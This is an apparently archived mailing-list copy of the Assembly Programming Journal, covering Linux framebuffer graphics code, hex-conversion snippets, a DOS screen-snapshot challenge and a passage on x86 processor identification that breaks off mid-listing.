/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                         Enter fbcon
                                                         by Konstantin Boldyshev


Many Linux users have heard something about fbcon. It is becoming more and
more popular, mostly because it makes graphics possible on an ordinary
terminal without X. So how do you use the graphics capabilities of fbcon?

The /dev/fb# devices represent frame buffer devices; they allow the frame
buffer of a video card to be read and written to by a user, and allow a
programmer to access the video hardware [and, more importantly, the video
memory] through ioctls and memory mapping.
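
As a taste of the ioctl side, here is a minimal C sketch that asks the driver
for the current mode, so a program can refuse to run in the wrong one. It
relies on FBIOGET_VSCREENINFO and struct fb_var_screeninfo from <linux/fb.h>.
The function name and its return convention are made up for this example.

```c
#include <fcntl.h>
#include <linux/fb.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Query resolution and colour depth of a frame buffer device.
   Returns 0 on success and -1 if the device cannot be opened or queried. */
int fb_query_mode(const char *path,
                  unsigned *xres, unsigned *yres, unsigned *bpp)
{
    struct fb_var_screeninfo var;
    int fd, rc;

    fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    rc = ioctl(fd, FBIOGET_VSCREENINFO, &var);
    close(fd);
    if (rc < 0)
        return -1;

    *xres = var.xres;            /* visible width in pixels  */
    *yres = var.yres;            /* visible height in pixels */
    *bpp  = var.bits_per_pixel;  /* colour depth             */
    return 0;
}
```

A caller would pass "/dev/fb0" and compare the three results with the mode it
expects.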

The general approach to using fbcon is pretty simple:
   1) open /dev/fb0
   2) mmap /dev/fb0
   3) .. do the thing .. (use pointer returned by mmap to access videomemory)
   4) munmap /dev/fb0
   5) close /dev/fb0
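
The five steps above, with the error checks that a size-optimized intro
leaves out, could be sketched in C like this. The function name, its
parameters and the "fill everything with one colour" body of step 3 are
made up for the example. The caller has to pass a size that the device
really provides.

```c
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Map size bytes of the device at path and fill them with one value.
   Returns 0 on success and -1 if open() or mmap() fails. */
int fill_mapped(const char *path, size_t size, unsigned char value)
{
    unsigned char *p;
    int fd;

    fd = open(path, O_RDWR);                          /* 1) open   */
    if (fd < 0)
        return -1;

    p = mmap(NULL, size, PROT_READ | PROT_WRITE,      /* 2) mmap   */
             MAP_SHARED, fd, 0);
    if (p == MAP_FAILED) {
        close(fd);
        return -1;
    }

    memset(p, value, size);                           /* 3) draw   */

    munmap(p, size);                                  /* 4) munmap */
    close(fd);                                        /* 5) close  */
    return 0;
}
```

For the 640x480x256 mode discussed in this article, the call would be
fill_mapped("/dev/fb0", 640 * 480, colour).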

I've taken one of my old DOS intros made in tasm, and rewritten it for nasm
and Linux/fbcon. At 408 bytes, this intro is the smallest implementation of
linear transformation with recursion (AFAIK).

Leaves.asm runs for about a minute and a half (depending on the machine), and
can be interrupted at any time with ^C. If everything is ok you should see two
branches of green leaves, and kinda wind blowing on them. It MUST be run only
in 640x480x256 mode (vga=0x301 in lilo.conf). You will see garbage or incorrect
colors in other modes.

Warning! The intro assumes that everything is ok with the system (/dev/fb0
exists, can be opened and mmap()ed, the correct video mode is set, and so on).
So, if you ain't root, check permissions on /dev/fb0 first, or you will not see
anything.

The source is quite portable; you only need to implement putpixel() and the
initialization part for your OS. To get the basic idea across, here is the
fbcon implementation in C:

//==========================================================================
// leaves.c : C implementation using /dev/fb0
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

typedef unsigned char byte;
typedef unsigned int  word;
typedef float dword;

#define MaxX 640
#define MaxY 480
#define VMEM_SIZE (MaxX*MaxY)

#define xc (MaxX/2)
#define yc (MaxY/2)
#define xmin0 100
#define xmax0 (-xmin0)
#define ymin0 xmin0
#define ymax0 (-ymin0)

#define colornum 8

int  h;
byte *p;

byte ColorTable[colornum] = { 0x00,0x00,0x02,0x00,0x00,0x02,0x0A,0x02 };
int color=0;

dword f=MaxY/(ymax0-ymin0)*3/2;
dword x1coef=MaxX-MaxY*4/9-yc;
dword y1coef=MaxY/4+xc;
dword x2coef=MaxY*4/9+yc;
dword x0=110;

dword a=0.7;
dword b=0.2;
dword c=0.5;
dword d=0.3;

void putpixel(word x,word y,byte color)
{
     *(p+y*MaxX+x) = color;
}

void leaves(dword x,dword y,byte n)
{
word x1,y1;

if (n>0)
   {
   y1=f*x+y1coef;

   putpixel(x1coef-f*y,y1,ColorTable[color]);
   putpixel(f*y+x2coef,y1,ColorTable[color]);

   if (++color>colornum-1) color=0;

   leaves(a*x+b*y,        b*x-a*y,     n-1);
   leaves(c*(x-x0)-d*y+x0,d*(x-x0)+c*y,n-1);

}
}

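int main(void)
{
int i;

      /* keep the descriptor in h so that close(h) below closes the right file */
      h=open("/dev/fb0",O_RDWR);
      if (h<0) return 1;

      p=mmap(0,VMEM_SIZE,PROT_READ|PROT_WRITE,MAP_SHARED,h,0);
      if (p==MAP_FAILED) { close(h); return 1; }

      for (i=0;i<VMEM_SIZE;i++) *(p+i) = 0;

      leaves(0,0,28);

      munmap(p,VMEM_SIZE);
      close(h);
      return 0;
}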
//--------------------------------------------------------------------------EOF

Here is the asm source. It is quite short and self-explanatory :) Well,
actually the source is heavily optimized for size, contains some Linux-specific
tricks, and can be hard to understand. Please refer to the C source for areas
that need clarification.

NOTE:     The following source was taken from asmutils and requires asmutils
         macros (*.inc), available from http://linuxassembly.org;
         you can also download binary there (in samples archive)

To compile leaves.asm:
           $ nasm -f elf leaves.asm
           $ ld -s -o leaves leaves.o

;==========================================================================
;Copyright (C) 1999 Konstantin Boldyshev <konst@...>
;
;leaves        -    fbcon intro in 408 bytes
;
;Ah, /if haven't guessed yet/ license is GPL, so enjoy! :)

%include "system.inc"

%assign SIZE_X 640
%assign SIZE_Y 480
%assign DEPTH 8
%assign VMEM_SIZE SIZE_X*SIZE_Y

%define MaxX 640.0
%define MaxY 480.0
%define xc MaxX/2
%define yc MaxY/2
%define xmin0 100.0
%define xmax0 -xmin0
%define ymin0 xmin0
%define ymax0 -ymin0

CODESEG
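;al         - color
;ebx        - y
;[esp+4]    - x on entry (left on top of the stack by the caller's fistp)
putpixel:
         push   edx
         lea    edx,[ebx+ebx*4]     ;edx = y*5
         shl    edx,byte 7          ;edx = y*640 (5*128)
         add    edx,[esp+8]         ;add x (one dword deeper after push edx)
         mov    [edx+esi],al        ;write to frame buffer (esi = mmap base)
         pop    edx
_return:
         ret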

; recursive function itself
leaves:
         mov    ecx,[esp+12]
         test   cl,cl
      jz   _return
         mov    [esp-13],cl
         mov    eax,[edi]
         push   ecx
         sub    esp,byte 8
      mov  edx,esp

      fld  dword [ebp+16] ;[f]
      fld  st0
      fld  st0
      fmul dword [edx+16]
      fadd dword [ebp+24] ;[y1coef]
      fistp     dword [edx]
         mov    ebx,[edx]
      fmul dword [edx+20]
      fsubr     dword [ebp+20] ;[x1coef]
      fistp     dword [edx]
         call   putpixel
      fmul dword [edx+20]
      fadd dword [ebp+28] ;[x2coef]
      fistp     dword [edx]
         call   putpixel
      inc  edi
         cmp    edi,ColorEnd
         jl     .rec
      sub  edi,byte ColorEnd-ColorBegin

.rec:
      fld  dword [ebp+4]  ;[b]
      fld  dword [ebp]    ;[a]
      fld  st1
      fld  st1
      fxch
      fmul dword [edx+16]
      fxch
      fmul dword [edx+20]
      fsubp     st1
      fstp dword [edx-8]

      fmul dword [edx+16]
      fxch
      fmul dword [edx+20]
      faddp     st1
      dec  ecx
         push   ecx
         sub    esp,byte 8
      fstp dword [esp]
         call   leaves         ;esp+12
      mov  edx,esp
      fld  dword [ebp+12] ;[d]
      fld  dword [edx+28]
      fld  dword [ebp+8]  ;[c]
      fld  dword [ebp+32] ;[x0]
      fsub to st2
      fld  st3
      fld  st2
      fxch
      fmul st4
      fxch
      fmul dword [edx+32]
      faddp     st1
      fstp dword [edx-8]

      fxch
      fmulp     st2
      fxch st2
      fmul dword [edx+32]
      fsubp     st1
      faddp     st1
         push   ecx
         sub    esp,byte 8
      fstp dword [esp]
         call   leaves
         add    esp,byte 12*2+8
         pop    ecx
.return:
         ret

;------------------------------------- main()
START:
;prepare structure for mmap on the stack
      mov  edi,VMEM_SIZE
      mov  esi,esp
      mov  [esi-16],edi                  ;.len
      mov  [esi-12],byte PROT_READ|PROT_WRITE ;.prot
      mov  [esi-8],byte MAP_SHARED            ;.flags
      mov  [esi],edx                ;.offset

;init fb
      mov  ebp,Params
      lea  ebx,[ebp+0x2C] ;fb-Params
      sys_open EMPTY,O_RDWR

      test eax,eax        ;have we opened file?
      js   exit

      mov  [esi-4],eax    ;mm.fd
      lea  ebx,[esi-20]
      sys_mmap

      test eax,eax        ;have we mmaped file?
      js   exit

      mov  esi,eax

;clear screen
      mov  ecx,edi
      mov  edi,esi
      xor  eax,eax
      rep  stosb

;leaves
      lea  edi,[ebp+0x24] ;ColorBegin-Params
         push   byte 28        ;recursion depth
      push eax
      push eax
         call   leaves

;close fb
      sys_munmap esi,VMEM_SIZE
      sys_close [mm.fd]

exit:
      sys_exit

;----------------------------Parameters
Params:

a    dd   0.7
b    dd   0.2
c    dd   0.5
d    dd   0.3

f    dd   0xc0400000     ;MaxY/(ymax0-ymin0)*3/2
x1coef    dd   0x433b0000     ;MaxX-MaxY*4/9-yc
y1coef    dd   0x43dc0000     ;MaxY/4+xc
x2coef    dd   0x43e28000     ;MaxY*4/9+yc
x0   dd   112.0

ColorBegin:
      db   0,0,2,0,0,2,10,2
ColorEnd:

fb   db   "/dev/fb0";,NULL

END
;===========================================================================EOF

More information on the frame buffer device can be found in the Linux kernel
documentation [ usually /usr/src/linux/Documentation ], in the files
framebuffer.txt, internals.txt, matroxfb.txt, tgafb.txt, and vesafb.txt. The
/dev/fb# ioctls are defined in /usr/include/linux/fb.h .

Enjoy the demo!
















::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                                       TOHEX
                                                                       by Ronald

;Summary:       Convert hexadecimal digits to ASCII
;Compatibility: PowerPC platform
;Notes:         Reads 3 parameters in R1-R3
;               R1 = Number to convert to ASCII representation
;               R2 = Number of LSD's of R1 to convert
;               R3 = Address to store ASCII representation of number to
;               R31 = Temp register that holds 4 bits
;               Note that R1 is ruined during execution
.global TOHEX, TOHEX_LOOP, LT_TEN, STEP_OVER, TOHEX_EXIT
TOHEX:
         cmpwi R2, 0
         beq TOHEX_EXIT
TOHEX_LOOP:
         andi. R31, R1, 15
         cmpwi R31, 10
         blt LT_TEN
         addi R31, R31, 'A'-10
         b STEP_OVER
LT_TEN:
         ori R31, R31, '0'
STEP_OVER:
         srwi R1, R1, 4
         subi R2, R2, 1
         stbx R31, R2, R3
         cmpwi R2, 0
         bne TOHEX_LOOP
TOHEX_EXIT:
         blr
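
For readers who do not speak PowerPC, the loop above can be followed in the C
sketch below. It is a hand translation for illustration only, not part of the
original snippet; the function name tohex() and its parameter names are made
up, and the three arguments stand in for R1, R2 and R3.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Writes the `ndigits` least significant hex digits of `value` to
   out[0..ndigits-1], most significant digit first. No terminator is
   written, as in the assembly snippet. */
void tohex(uint32_t value, size_t ndigits, char *out)
{
    assert(out != NULL);
    while (ndigits > 0) {
        unsigned nibble = value & 15;            /* andi. R31, R1, 15 */
        char ch = (nibble < 10) ? (char)('0' + nibble)
                                : (char)('A' - 10 + nibble);
        value >>= 4;                             /* srwi R1, R1, 4    */
        ndigits--;                               /* subi R2, R2, 1    */
        out[ndigits] = ch;                       /* stbx R31, R2, R3  */
    }
}
```

The digits are stored from the end of the buffer towards the start, which is
why the least significant nibble can be handled first.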


                                                                      Hex2ASCII
                                                                      by cpuburn
;Summary:       Converts
;Compatibility: K7
;Notes:         This
;      While doing some light reading of the AMD K7 Athlon Optimization
;Manual, I came across one of the neatest hex-to-ASCII converters
;I've ever seen:

Example 5 - Hexadecimal to ASCII conversion
(y = x < 10 ? x + 0x30 : x + 0x37):

MOV AL, [X]  ;load X value
CMP AL, 10   ;if x is less than 10, set carry flag
SBB AL, 69h  ;0..9 -> 96h..9Fh, Ah..Fh -> A1h..A6h
DAS          ;0..9: subtract 66h, Ah..Fh: subtract 60h
MOV [Y],AL   ;save conversion in y
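
If the CMP/SBB/DAS trick looks like magic, it can be stepped through in C. The
sketch below models only the flag behaviour these three instructions rely on
(CF and AF), following the documented DAS rules; the function name
hex_digit_das() is made up for the example and nothing here comes from the AMD
manual itself.

```c
#include <assert.h>
#include <stdint.h>

/* Emulates CMP AL,10 / SBB AL,69h / DAS for one hex digit x (0..15). */
char hex_digit_das(uint8_t x)
{
    assert(x < 16);

    /* CMP AL,10: carry is set when x < 10 (unsigned borrow) */
    unsigned cf = (x < 10);

    /* SBB AL,69h: AL = AL - 69h - CF; AF is the borrow out of the low nibble */
    unsigned af = (x & 0x0Fu) < (0x09u + cf);
    uint8_t  al = (uint8_t)(x - 0x69u - cf);
    cf = 1;                                   /* 0..15 is always below 69h */

    /* DAS: decimal adjust after subtraction */
    uint8_t old_al = al;
    if ((al & 0x0Fu) > 9 || af)
        al = (uint8_t)(al - 0x06u);           /* taken for 0..9 only */
    if (old_al > 0x99u || cf)
        al = (uint8_t)(al - 0x60u);           /* taken for every digit */

    return (char)al;
}
```

For digits 0..9 both adjustments fire (66h in total), for Ah..Fh only the
second one does (60h), which is exactly what the comments in the listing say.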

                                                           MMX ltostr
                                                           by Cecchinel Stephan
;Summary:       Convert long [dword] value to an ASCII string
;Compatibility: MMX
;Notes:         Converts a number in EAX to an 8 bytes hexadecimal string
;               at [edi]
;               14 clocks on a Celeron-333
Sum1:      dd 0x30303030, 0x30303030
Mask1:    dd 0x0f0f0f0f, 0x0f0f0f0f
Comp1:    dd 0x09090909, 0x09090909
Hex32:
         bswap eax
         movq mm3,[Sum1]
         movq mm4,[Comp1]
         movq mm2,[Mask1]
         movq mm5,mm3
         psubb mm5,mm4
         movd mm0,eax
         movq mm1,mm0
         psrlq mm0,4
         pand mm0,mm2
         pand mm1,mm2
         punpcklbw mm0,mm1
         movq mm1,mm0
         pcmpgtb mm0,mm4
         pand mm0,mm5
         paddb mm1,mm3
         paddb mm1,mm0
         movq [edi],mm1
         ret



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                               by Laura Fairhead


Challenge
~~~~~~~~~
Write a program that takes a snapshot of a text screen and writes it
to a file. It should work in any text mode and lines should be terminated
with newlines in the file so that it can easily be viewed in a standard
editor. ( 04Dh = 77 bytes )

Solution
~~~~~~~~
If you want to assemble this just remember FS = 064h, as MASM can't cope
with legal x86 code. Then just replace the (single) offset 0148h with
some name, then data is the filename at the end "SNAP",0. Obviously
the B's prefixing the addresses mean "BYTE PTR", and ALL the numbers
are in HEX.

=Z10 0
=NSUC0.COM
=L
0000004D
=U100 147
1CB6:0100 B8 30 11          MOV     AX,1130
1CB6:0103 32 FF             XOR     BH,BH
1CB6:0105 CD 10             INT     10              ;DL=rows-1
1CB6:0107 B4 0F             MOV     AH,0F
1CB6:0109 CD 10             INT     10              ;AH=columns
1CB6:010B 0E                PUSH    CS              ;1st BIOS call
1CB6:010C 07                POP     ES              ;corrupts ES
1CB6:010D 52                PUSH    DX              ;
1CB6:010E 50                PUSH    AX              ;set B[BP+1]=columns
1CB6:010F 8B EC             MOV     BP,SP           ;    B[BP+2]=rows
1CB6:0111 BA 48 01          MOV     DX,0148         ;open (CREATE) file
1CB6:0114 33 C9             XOR     CX,CX           ;name "SNAP"
1CB6:0116 B4 3C             MOV     AH,3C
1CB6:0118 CD 21             INT     21
1CB6:011A 93                XCHG    BX,AX           ;handle stays in BX
1CB6:011B 33 F6             XOR     SI,SI           ;SI read screen offset
1CB6:011D BA 80 00          MOV     DX,0080         ;DX data store in PSP
1CB6:0120 B8 00 B8          MOV     AX,B800
1CB6:0123 8E E0             MOV     FS,AX           ;FS screen segment
1CB6:0125 8B FA             MOV     DI,DX           ;outer loop rows
1CB6:0127 0F B6 4E 01       MOVZX   CX,B [BP+0001]  ;miss out the attribute
1CB6:012B 64 AD             FS: LODSW               ;byte, copying to
1CB6:012D AA                STOSB                   ;DS:080
1CB6:012E E2 FB             LOOP    012B
1CB6:0130 B8 0D 0A          MOV     AX,0A0D         ;n/l on row end
1CB6:0133 AB                STOSW
1CB6:0134 8B CF             MOV     CX,DI
1CB6:0136 2B CA             SUB     CX,DX           ;CX=data length
1CB6:0138 B4 40             MOV     AH,40           ;write row to file
1CB6:013A CD 21             INT     21
1CB6:013C FE 4E 02          DEC     B [BP+0002]     ;loop for row count
1CB6:013F 79 E4             JNS     0125
1CB6:0141 66 58             POP     EAX             ;clean-up stack
1CB6:0143 B4 3E             MOV     AH,3E           ;close file
1CB6:0145 CD 21             INT     21
1CB6:0147 C3                RET                     ;go CS:0 !
=D148 14C
1CB6:0148 53 4E 41 50 00                                  SNAP
=Q

If you've never seen the 2 BIOS calls before then you'd better take a look
at Ralf Brown's legendary interrupt list.

You may always override the source segment DS: on a string instruction,
but you cannot override the destination segment ES: ever.

It's left as an exercise for you to incorporate error handling (since there
is none) and still better the length of this code ;)
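
If the listing is hard to follow, the row loop at its heart can be pictured in
C. The sketch below is only an illustration of the copy step (take the
character byte, skip the attribute byte, end each row with CR LF); the function
name snapshot_text() and its parameters are made up, and the BIOS and file
calls are left out entirely.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Copies the character bytes of a cols x rows text screen to out, skipping
   the attribute bytes and ending each row with CR LF. out must have room
   for rows*(cols+2) bytes. Returns the number of bytes written. */
size_t snapshot_text(const uint8_t *screen, int cols, int rows, char *out)
{
    assert(screen != NULL && out != NULL && cols > 0 && rows > 0);
    size_t n = 0;
    for (int r = 0; r < rows; r++) {
        for (int c = 0; c < cols; c++) {
            out[n++] = (char)screen[0];   /* character byte (LODSW / STOSB) */
            screen += 2;                  /* skip the attribute byte        */
        }
        out[n++] = '\r';                  /* MOV AX,0A0D / STOSW            */
        out[n++] = '\n';
    }
    return n;
}
```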



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#15 From: "Hiroshimator" <hiroshimator@...>
Date: Wed Jan 5, 2000 12:10 am
Subject: Happy Millenium
 
Happy New Year and a productive ASM Millenium to all of you!

#14 From: "Michael Mondragon" <mammon_@...>
Date: Mon Nov 15, 1999 1:29 am
Subject: APJ Issue#6 Oct-Now 99
 
______________________________________________________
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                                Oct/Nov  99
:::\_____\::::::::::.                                               Issue     6
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Processor Identification"........................Chris.Dragan.&.Chili

"Timing with the 8254 PIT"...............................Jan.Verhoeven

"Programming the Universal Graphics Mode"................Jan.Verhoeven

"Conway's Game of Life".................................Laura.Fairhead

"'Ambulance Car' Disassembly"....................................Chili

"'Ambulance Car' Disinfector"....................................Chili

"Assembling for PIC's"...................................Jan.Verhoeven

"Splitting Strings"............................................mammon_

"String to Numeric Conversion"..........................Laura.Fairhead

Column: Win32 Assembly Programming
     "WndProc, The Dirty Way".................................X-Calibre
     "Programming the DOS Stub"...............................X-Calibre

Column: The Unix World
     "Using ioctl()"............................................mammon_

Column: Assembly Language Snippets
     "BinToString"....................................Cecchinel Stephan

Column: Issue Solution
     "Absolute Value"....................................Laura.Fairhead

----------------------------------------------------------------------
        ++++++++++++++++++Issue  Challenge+++++++++++++++++
		   Find the Absolute Value of a Register in  4 Bytes
----------------------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                      by mammon_


Customarily I'll start with the bad news: this issue is about a week late,
primarily because I had forgotten about the two Win32 articles X-Calibre
passed on to me a month or two ago. The good news, however, is that there
may be a December issue; currently I have about 5 or so extra articles that
threatened to bump this issue over the 200K mark. Eventually I may have a
chance to be late on a monthly basis...

This issue has a bit of a 'back to the basics' feel about it. Packed inside
are articles dealing with some of the 'classics' of assembly: CPU identific-
ation, graphics, and the ever-popular Game of Life. The disassembly of the
Ambulance Car virus also has an old-school feeling to it, hearkening back to
the old days of DOS and com files.

Additional highlights include X-Calibre's 'bending windows to your will' Win32
articles, two excellent chip programming articles from Jan, utility routines
from Laura and myself, and of course my usual attempt to defend assembly as a
viable programming language for the Unix environment.

Enough commentary; time to get this mag on the road!



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                        Processor Identification
                                                        by Chris Dragan & Chili


Being able to identify the processor on which your program is running can be a
very useful feature: if not to ensure that your program will work on a wider
range of computers, then at least to provide minimum compatibility and
guarantee that it will not crash on some processors.

The first part of this article explains how to distinguish between the 80486
and older processors by checking for known behaviours, while the second part
(written by Chris) takes it one step further, explaining how to use the CPUID
instruction on newer processors, how to read the ID register by means of a
triple-fault reset (TFR), and how to correctly identify a Cyrix processor.


EFLAGS Register
---------------
On old pre-286 CPUs, bits 12 through 15 of the FLAGS register are always set,
so we can tell this type of processor from newer ones by attempting to clear
those bits:

                 pushf
                 pop     ax
                 and     ax, 0fffh       ; clear bits 12-15
                 push    ax
                 popf
                 pushf
                 pop     ax
                 and     ax, 0f000h
                 cmp     ax, 0f000h      ; check if bits 12-15 are set
                 je      _is_an_older_cpu
                 jne     _is_a_286_or_higher

Once we know that we are at least on a 286 processor,  we can then check to see
if we're on a 32-bit processor  (386 or higher)  or on an actual 286.  For this
purpose we know that bits 12-15 of the FLAGS register are always clear on a 286
processor in real mode:

                 pushf
                 pop     ax
                 or      ax, 0f000h      ; set bits 12-15
                 push    ax
                 popf
                 pushf
                 pop     ax
                 and     ax, 0f000h      ; check if bits 12-15 are clear
                 jz      _is_a_286
                 jnz     _is_a_386_or_higher

If instead, the processor is running in  protected mode these bits are used for
the IOPL (bits 12-13) and NT (bit 14) flags. Note that bits 12-14 hold the last
value loaded  into them on 32-bit processors  in real mode.  Also remember that
there is no virtual-8086 mode on 16-bit processors.

In order to find out if the processor is in real or protected mode we must test
whether the Protection Enable flag (bit 0 of CR0) is set; if so, we're in
protected mode:

                 smsw    ax
                 and     ax, 0001h       ; check if bit 0 (PE) is clear
                 jz      _real_mode
                 jnz     _protected_mode

To find out  if it is a 486 or a  newer processor we'll try  to set the AC flag
(bit 18),  since it  is always  clear on a  386 processor  (also NexGen Nx586),
unlike newer ones that allow it to be toggled:

                 pushfd
                 pop     eax
                 mov     ebx,eax
                 xor     eax,40000h      ; toggle bit 18
                 push    eax
                 popfd
                 pushfd
                 pop     eax
                 xor     eax,ebx         ; check if bit 18 changed
                 jz      _is_a_386
                 jnz     _is_a_486_or_higher

And finally, to check whether we're on an old 486 or on a new 486 or newer
processor (i.e. Pentium), we'll try to toggle the ID flag (bit 21), which
indicates the presence of a processor that supports the CPUID instruction. This
part is explained below in the section about CPUID.


PUSH SP Instruction
-------------------
Before the 286, processors implemented the "PUSH SP" instruction in a different
way,  updating the stack  pointer before  the value  of SP  is pushed  onto the
stack,  unlike newer processors  which push the value  of the SP register as it
existed before  the instruction  was executed  (both in  real and  virtual-8086
modes).

   Older CPUs            286+
   {                     {
    SP = SP - 2           TEMP = SP
    SS:SP = SP            SP = SP - 2
   }                      SS:SP = TEMP
                         }

   (credit for the PUSH SP algorithm representation goes to Robert Collins)

So all  one has to  do is see if  the values of  the SP register  are different
before and after the PUSH SP:

                 push    sp
                 pop     ax
                 cmp     ax, sp          ; check if SP values differ
                 je      _is_a_286_or_higher
                 jne     _is_an_older_cpu
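
To see why the comparison comes out differently, the two PUSH SP algorithms can
be modelled in a few lines of C. This is a toy simulation for illustration
only: the Cpu structure, the 64-byte stack and all function names are made up,
and nothing here touches the real stack pointer.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

enum { STACK_BYTES = 64 };

typedef struct {
    uint16_t sp;
    uint8_t  mem[STACK_BYTES];
    bool     pre_286;          /* true: the SP is updated before it is stored */
} Cpu;

static void store16(Cpu *c, uint16_t addr, uint16_t v)
{
    assert(addr + 1 < STACK_BYTES);
    c->mem[addr]     = (uint8_t)(v & 0xFFu);
    c->mem[addr + 1] = (uint8_t)(v >> 8);
}

static uint16_t load16(const Cpu *c, uint16_t addr)
{
    assert(addr + 1 < STACK_BYTES);
    return (uint16_t)(c->mem[addr] | (c->mem[addr + 1] << 8));
}

static void push_sp(Cpu *c)
{
    uint16_t temp = c->sp;                 /* TEMP = SP (286+ only uses this) */
    c->sp = (uint16_t)(c->sp - 2);         /* SP = SP - 2                     */
    store16(c, c->sp, c->pre_286 ? c->sp : temp);
}

static uint16_t pop16(Cpu *c)
{
    uint16_t v = load16(c, c->sp);
    c->sp = (uint16_t)(c->sp + 2);
    return v;
}

/* push sp / pop ax / cmp ax, sp */
bool detects_286_or_higher(bool pre_286)
{
    Cpu c = { .sp = STACK_BYTES, .pre_286 = pre_286 };
    push_sp(&c);
    uint16_t ax = pop16(&c);
    return ax == c.sp;
}
```

On the modelled older CPU the popped value is 2 less than SP, so the values
differ; on the modelled 286+ they are equal.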

Note - If you want  the same result  on all processors,  use the following code
        instead of a PUSH SP instruction:

                 push    bp
                 mov     bp, sp
                 xchg    bp, [bp]


Shift and Rotate Instructions
-----------------------------
Starting with the 186/88, all processors mask shift/rotate counts by modulo 32,
restricting  the maximum count to 31  (in all  operating modes,  including  the
virtual-8086 mode).  Earlier CPUs do not mask  the shift/rotation count,  using
all 8-bits of CL.  So, if we try to perform a 32-bit shift, on newer processors
we'll  end up  with the  same result  (since the  shift count  is masked to 0),
whereas on an older processor the result will be zero:

                 mov     ax, 0ffffh
                 mov     cl, 32
                 shl     ax, cl
                 test    ax, ax          ; check if result is zero (a shift by a
                                         ; masked count of 0 leaves flags alone)
                 jz      _is_an_older_cpu
                 jnz     _is_a_18x_or_higher
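
The arithmetic behind this test is small enough to model in C. The sketch below
is an illustration only: shl16() and looks_like_older_cpu() are made-up names,
and the masks_count flag simply selects which of the two documented behaviours
is simulated.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Models SHL AX,CL. masks_count selects the 186-and-later behaviour,
   where only the low 5 bits of the count are used. */
uint16_t shl16(uint16_t ax, uint8_t cl, bool masks_count)
{
    unsigned count = masks_count ? (cl & 31u) : cl;
    if (count >= 16)
        return 0;                 /* every bit has been shifted out */
    return (uint16_t)((unsigned)ax << count);
}

/* Repeats the test above: shift 0FFFFh left by 32 and look at the result. */
bool looks_like_older_cpu(bool masks_count)
{
    uint16_t result = shl16(0xFFFFu, 32, masks_count);
    assert(result == 0 || result == 0xFFFFu);
    return result == 0;
}
```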


MUL Instruction
---------------
NEC processors differ from Intel's with respect to the handling of the zero
flag (ZF) during a MUL operation. A NEC V20/V30 does not clear ZF after a
multiplication with a non-zero result, so a ZF that was set beforehand stays
set, whereas an Intel 8086/88 will always clear it (note that this is only
true for the specified processors):

                 xor     al, al          ; force ZF to set
                 mov     al, 40h
                 mul     al              ; check if ZF is clear
                 jz      _is_a_NEC_V20_V30
                 jnz     _is_an_Intel_808x

In addition to the list of sites where you can find more information,  provided
by Chris at the end of this article, you can also try this one:

         http://grafi.ii.pw.edu.pl/gbm/x86/     (Grzegorz Mazur)

And also the following packages/programs (available somewhere on the net):

         The Undocumented PC                    (Frank van Gilluwe)
         HelpPC                                 (David Jurgens)
         80x86.CPU file                         (Christian Ludloff)


ID Register
-----------
Beginning  with the 80386 processor,  Intel included  a so-called  ID register,
which  contains  information  about  the  processor  model and  stepping.  This
register is accessible in an unusual way - it is passed in DX after reset.

To read the ID register one must perform the following steps:

  1. By storing value 0Ah (resume with jump)  at address 0Fh (reset code) in the
     CMOS data area,  inform BIOS not to  issue POST after reset,  but to return
     the control to the program.
  2. Update after-reset-far-jump address at 0040h:0067h.
  3. Set  shutdown  status  word  (0040h:0072h)  to  0,   to  avoid  undesirable
     side-effects.
  4. Cause a reset.

Causing a reset  is typically done by  issuing a so-called  triple-fault-reset,
i.e.  causing  an error  from which the  processor  cannot  recover and  enters
a reset state.  TFR (triple...)  can be  done only  if we  have enough  control
over  the processor,  i.e.  under plain  DOS  in  real mode  (no EMS)  or under
Win'95 (this is risky).  The following code shows how to do it in DOS. The code
is assumed to be in a COM program.

;------------------------------------------------------------------------------

section .data

GDT             dd 0, 0                 ; Selector 0 is empty
                 dd 0000FFFFh, 00009A00h ; Selector 8 - code segment
GDTR            dw 000Fh, 0, 0          ; Limit 0Fh - two selectors
IDTR            dw 0, 0, 0              ; Empty IDT will cause TFR
SaveSP          dw 0                    ; Stack pointer saved across the reset

section .text

         ; Ensure that we are in real mode, not in V86
                 smsw    ax
                 and     al, 1
                 jnz     near _skip_tfr_since_in_v86_mode

         ; Update code descriptor as we are going to enter pmode
                 xor     eax, eax
                 mov     ax, cs
                 shl     eax, 4
                 or      [GDT+10], eax
                 add     eax, GDT
                 mov     [GDTR+2], eax

         ; Update reset code in CMOS data area
                 cli                             ; Disable interrupts
                 mov     [SaveSP], sp            ; Save stack pointer
                 mov     al, 0Fh                 ; Address 0Fh in CMOS area
                 out     70h, al
times 3         jmp     short $+2               ; Short delay
                 mov     al, 0Ah                 ; Value 0Ah - far jump
                 out     71h, al

         ; Update resume address
                 push    word 0
                 pop     es
                 mov     [es:0467h], word _tfr   ; offset
